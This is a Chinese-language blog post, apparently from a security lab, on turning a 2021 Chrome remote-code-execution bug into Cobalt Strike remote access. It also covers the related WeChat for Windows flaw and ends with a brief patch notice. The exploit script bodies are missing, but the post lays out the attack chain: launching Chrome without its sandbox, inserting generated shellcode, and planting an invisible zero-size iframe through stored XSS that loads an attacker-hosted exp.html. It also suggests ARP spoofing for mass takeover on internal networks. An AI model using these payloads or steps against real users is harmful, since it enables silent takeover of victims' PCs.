前言
最近 Google Chrome 浏览器被爆出存在远程代码执行漏洞(CNVD-2021-27989),攻击者只需要构造一个恶意的 html 页面诱导用户点击访问,就能实现对浏览器的远程代码执行攻击。但是攻击者单独利用该漏洞无法实现沙盒(SandBox)逃逸。沙盒是 Google Chrome 浏览器的安全边界,防止恶意攻击代码破坏用户系统或者浏览器其他页面。Google Chrome 浏览器默认开启沙盒保护模式。
漏洞影响范围:Google Chrome < = 89.0.4389.114。
点击链接打开记事本
该 Poc 来自于网络:
<script>
手动打开 Chrome 的时候关闭沙箱然后打开 poc.html 即可弹出记事本:
chrome.exe -no-sandbox
点击链接上线到 CobaltStrike
首先通过 CobaltStrike 开启一个监听器,我这边选择的是 http:
之后生成一个 C 的 shellcode(x64):
之后把生成的 Poc 中的 shellcode,\ 替换为 ,0 :
替换前:
替换后:
之后把 shellcode 替换到第七行里:
<script>
随后保存为 exp.html ,让目标打开:
这个时候目标成功上线到 CobaltStrike:
XSS+Chrome Rce = 上线到CobaltStrike
假设有一个网站存在存储XSS漏洞,可以插入这段 Payload 并加载一个远程 html 页面,若目标机器关闭了沙盒并且使用的是 Chrome 浏览器,就可导致访问此页面的人上线到 CobaltStrike。
同时,在内网场景也可使用ARP来进行大规模PC权限的获取。
具体使用到的标签是:
<iframe src="http://192.168.84.248/exp.html" width="0" height="0">
我把宽度和高度都设置为 0 ,这样目标就无法看到 exp.html 页面了!
演示代码:
其中 http://192.168.84.248/exp.html 是攻击者构造好的恶意页面,当我们访问到了被插入 XSS Payload 的页面,就会自动加载 exp.html 成功上线到 CobaltStrike:
思路大家可自由延伸。
Windows版微信加载JS运行Shellcode
通过微信点击URL链接,过程中会调用微信内置浏览器(chrome内核,并开启了--no-sandbox参数)。针对chrome漏洞利用的js代码成功执行后,shellcode将启动远控进程,最终获取该PC当前用户权限。
组件: Windows版微信
漏洞类型: 远程代码执行
影响: PC接管
简述: 攻击者可以通过微信发送一个特制的web链接,用户一旦点击链接,Windows版微信便会加载执行攻击者构造恶意代码,最终使攻击者控制用户PC。
Tencnet:Windows版微信: 小于等于3.2.1.141版本修复建议
目前微信已经修复漏洞并发布了更新版本,建议用户立即将Windows版微信更新到3.2.1.141``以上的最新版本。
InBug-实验室
InScan内网扫描器:https://github.com/inbug-team/InScan